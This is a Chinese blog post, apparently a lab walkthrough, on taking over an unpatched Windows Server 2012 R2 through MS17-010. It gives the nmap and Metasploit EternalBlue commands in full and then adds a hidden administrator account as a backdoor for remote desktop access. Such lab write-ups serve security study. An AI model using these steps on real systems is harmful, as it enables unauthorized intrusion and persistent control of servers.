这几天给客户装了好多服务器,很多系统是windows server 2012 R2的,装完后也没有打补丁,然后我就对这个没打补丁的系统扫了一下还真发现了高危漏洞。(比较简单,不喜勿喷)

首先自己搭建的环境:kali linux (192.168.1.1) + windows server 2012 R2 (192.168.1.2) +一台普通win7客户机 (192.168.1.254)
网络设置为仅主机模式

在kali中使用nmap扫描开启的服务 nmap -P0 -p0-65535 192.168.1.2 (跳过ping检测直接扫描开发的端口)

发现开放的端口有:80(WEB服务器)、445(网络打印机)、3389(远程桌面)等,本次是利用SMB(服务器信息块)服务出现的漏洞,端口号为445。
使用nmap自带的漏洞扫描功能进行常见漏洞扫描:nmap –script=vuln 192.168.1.2
扫描到一个高危漏洞:

接下来输入msfconsole 打开攻击神器——metasploit。(大佬们都不屑于使用这个,原谅我是个菜鸡)

输入search ms17-010 搜索漏洞利用模块:

有五个模块,具体我就不翻译了。百度一下你就知道。
首先使用辅助模块 use auxiliary/scanner/smb/smb_ms17_010:
输入show options查看需要设置的选项;
输入set rhosts 192.168.1.2设置要攻击的服务器地址。

输入run执行模块:

完成后切换模块,换成攻击的模块 use exploit/windows/smb/ms17_010_eternalblue_win8:(别问我为什么要用这个模块,我挨个试的)
输入show options查看需要设置的选项;
输入set rhosts 192.168.1.2设置要攻击的服务器地址。

然后输入run发起攻击,攻击成功后输入一个简单的cmd命令查看,比如dir(列出目录):

看到这个效果就表示服务器已经被拿下了,然后此时你并不是服务器的超级管理员,所以需要进一步提权(添加一个隐藏的超级管理员)。
执行命令查看该服务器下的用户:net user

发现该服务器中存在一个管理员账户Administrator和一个访客用户Guest。
然后添加一个隐藏账户$admin 密码为123.abc(密码简单了不行,默认情况下必须满足密码复杂度才能设置) 并将这个用户提升到超级管理员权限:net user $admin 123.abc /add net localgroup administrators $admin /add

换一台windows的电脑使用远程桌面连接3389:

然后这台服务器就被你彻底控制了,用户如下,清理痕迹就不做了,要下班了。。。

相关文章
评论
分享
  • CVE-2019-0708漏洞利用

    CVE-2019-0708漏洞利用9月7日上午,群里被CVE-2019-0708漏洞刷屏,原来是那个号称wannacry级别的漏洞 BlueKeep(CVE-2019-0708)漏洞利用发布了。吓得老夫赶紧打开虚拟机更新了一下kali...

    CVE-2019-0708漏洞利用
  • 利用php输入流getshell教程

    利用php输入流getshell教程
  • sql注入

    依旧是使用DVWA。。 sql注入初级代码:<?php if(isset($_GET['Submit'])){ // Retrieve data $id = $_GET['id'];...

    sql注入
  • PHP文件上传漏洞

    目录: 初级 中级 高级 防护措施 1.初级:上传漏洞很简单,刚刚看完一个多小时的教程心情很是惆怅,决定把老师讲的记下来。依旧是用DVWA这玩意进行练习。先从初级开始,首先分析一下php的源代码: <?php if (is...

    PHP文件上传漏洞
  • PHP文件包含漏洞与NC注入和php输入流

    目录:文件包含漏洞原理nc注入php输入流 1:文件包含漏洞的原理其实目录遍历漏洞和文件包含漏洞的原理是一样的,无非是文件包含漏洞可以包含远程服务器的文件,不知道业界纠结这个鬼问题干嘛,我就放一块写了。文件包含漏洞又分为两种,一是本地...

    PHP文件包含漏洞与NC注入和php输入流